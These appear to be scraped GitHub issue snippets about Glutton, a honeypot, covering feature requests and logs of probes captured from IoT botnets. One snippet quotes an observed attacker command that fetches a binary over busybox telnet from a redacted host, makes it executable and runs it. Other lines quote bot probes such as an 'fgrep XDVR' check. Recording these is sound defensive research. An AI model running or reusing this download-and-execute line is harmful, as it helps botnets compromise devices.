Lukas Rist
Lukas Rist
If Glutton is started as root, we should drop privileges to the `nobody` user.
read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test
satori
``` INFO[20219] [telnet ] recv: "/bin/busybox satori\x00\r\n" INFO[20220] [telnet ] send: "> " ``` Seeing lots of those and no further stage. Ideas?
Add capability to add a delay to responses. Delay should be random in range. Global or per port and transport layer.
Create a PCAP, pass it to TShark (https://www.wireshark.org/docs/man-pages/tshark.html) for dissection and use the protocol info to pick the right handler.
On port 3260 ``` 00000000 03 81 00 00 00 00 00 5f 40 00 01 37 00 00 00 00 |[email protected]....| 00000010 00 00 00 01 00 01 00...
DEBU[1386] [freki ] new connection 188.X.X.X:47651->5005 DEBU[1386] [contable] registering 188.X.X.X:47651->5005 DEBU[1386] [glutton ] new connection: 188.X.X.X:47651 -> 5005 ``` 00000000 4a 44 57 50 2d 48 61 6e 64 73...
DEBU[0648] [freki ] new connection 47.X.X.X:56695->9000 DEBU[0648] [contable] registering 47.X.X.X:56695->9000 DEBU[0648] [glutton ] new connection: 47.X.X.X:56695 -> 9000 ``` 00000000 52 45 4d 4f 54 45 20 48 49 5f...
@gento I see a bunch of those lately: `fgrep XDVR /mnt/mtd/dep2.sh\x00` after that there is no additional step. I assume they expect a specific response payload.
Has anyone seen events that look like those described here? https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/